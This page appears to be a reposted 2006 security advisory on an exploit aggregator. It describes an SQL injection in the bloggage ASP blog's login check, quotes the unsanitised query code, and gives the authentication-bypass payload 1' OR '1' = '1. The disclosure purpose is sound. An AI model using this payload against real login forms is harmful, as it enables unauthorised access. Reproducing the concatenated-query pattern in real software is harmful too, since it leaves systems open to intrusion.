Advertisement






bloggage Remote SQL Injection

CVE Category Price Severity
N/A CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2006-04-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L 0.06545 0.64529

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040076

Below is a copy:

I found a Remote SQL Injection into bloggage.

------------------------------------------------------------------
          - bloggage Remote SQL Injection Exploit -
   -= http://colander.altervista.org/advisory/bloggage.txt =-
------------------------------------------------------------------

-= Bloggage =-



Omnipresent
April 20, 2006


Vunerability(s):
----------------
SQL Injection


Product:
--------
bloggage

Vendor:
--------
http://ccc.domaindlx.com/bloggage/default.asp


Description of product:
-----------------------

Now Bloggage is Open Source!!!

Welcome to bloggage. It is a new generation fusion of blogging and homepage. It is made for those who currently 
keep separate homepages and blogs and find it difficult to maintain both. Anyone can use bloggage with ease. 
It has many unique features such as user privileges, commenting system, WYSIWYG editor, template system, customized 
layout of the blog and many others. Best of all, It's FREE!!!!!! So enjoy bloggage and please supply your comments for 
future improvements.


Vulnerability / Exploit:
------------------------

This software is vulnerable to a SQL Injection.

If you look into: login.asp there is:

<form action="check_login.asp" method="post">
      <table width="100%" border="0">
        <tr>
          <td width="16%">Account Name</td>
          <td width="84%"><input name="acc_name" type="text" maxlength="50"></td>
        </tr>
        <tr>
          <td>Password</td>
          <td><input name="password" type="password" maxlength="50"></td>
        </tr>
        <tr>

[...]

You can see that this script call an other script called check_login.asp.
In check_loging.asp there is a flaw that can allow an attacker to exploit the hole with Remote SQL Injection because the 
variables acc_name and password are not properly sanitised.

So, in check_login.asp there is:

[...]
RS.Open "SELECT Account_Name FROM registration WHERE Account_Name='" & acc_name & "' AND Password='" & password & "'", DB
[...]

If an attacker put this codes 1' OR '1' = '1 into acc_name and password variables he can login into blogger!

the query will be:

RS.Open "SELECT Account_Name FROM registration WHERE Account_Name='1' OR '1' = '1' AND Password='1' OR '1' = '1', DB


Vendor Status
-------------

The vendor is informed but I've not received reply!

Credits:
--------
omnipresent
[email protected]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum